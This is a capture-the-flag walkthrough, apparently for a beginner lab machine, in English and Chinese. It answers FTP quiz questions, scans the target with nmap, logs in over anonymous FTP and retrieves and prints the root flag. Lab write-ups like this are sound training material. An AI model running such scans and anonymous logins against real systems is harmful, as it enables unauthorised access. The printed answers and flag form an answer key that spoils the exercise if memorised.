# Task 1
Q:What does the 3-letter acronym FTP stand for?
A:File Transfer Protocol
# Task 2
Q:What communication model does FTP use, architecturally speaking?
A:client-server model
# Task 3
Q:What is the name of one popular GUI FTP program?
A:FileZilla
# Task 4
Q:Which port is the FTP service active on usually?
A:21 tcp
# Task 5
Q:What acronym is used for the secure version of FTP?
A:sftp
# Task 6
Q:What is the command we can use to test our connection to the target?
A:ping
# Task 7
询问我们目标上开启的什么服务以及版本号
扫描一下
扫描
┌──(root💀kali)-[~] | |
└─# nmap -sV 10.129.214.200 | |
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 19:22 CST | |
Nmap scan report for 10.129.214.200 | |
Host is up (0.62s latency). | |
Not shown: 999 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
21/tcp open ftp vsftpd 3.0.3 | |
Service Info: OS: Unix | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds |
nmap
中的 -sV
是扫描端口服务以及其版本名称的
因此得到答案
A:vsftpd 3.0.3
# Task 8
Q:From your scans, what OS type is running on the target?
要让我们识别目标机器的操作系统是什么
nmap -O
没有识别出来,但是不要紧,我们可以根据他答案的提示的出答案
A:Unix
# Task 9
Q:Submit root flag
需要我们提交 flag 了
既然之前扫描出来了有 ftp 服务,那么我们就用 ftp 连接一下试试
连接
┌──(root💀kali)-[~] | |
└─# ftp 10.129.214.200 |
尝试用匿名用户 anonymous
登录试试看,密码为空。
Connected to 10.129.214.200. | |
220 (vsFTPd 3.0.3) | |
Name (10.129.214.200:root): anonymous | |
331 Please specify the password. | |
Password: | |
230 Login successful. | |
Remote system type is UNIX. | |
Using binary mode to transfer files. |
ls
查看一下有什么文件
ftp> ls | |
200 PORT command successful. Consider using PASV. | |
150 Here comes the directory listing. | |
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt | |
226 Directory send OK. |
发现了 flag.txt
,那么我们 get
下载下来看看
ftp> get flag.txt | |
local: flag.txt remote: flag.txt | |
200 PORT command successful. Consider using PASV. | |
150 Opening BINARY mode data connection for flag.txt (32 bytes). | |
226 Transfer complete. | |
32 bytes received in 0.00 secs (187.1257 kB/s) |
打开文件就能得到 flag 了
┌──(root💀kali)-[~] | |
└─# cat flag.txt | |
035db21c881520061c53e0536e44f815 |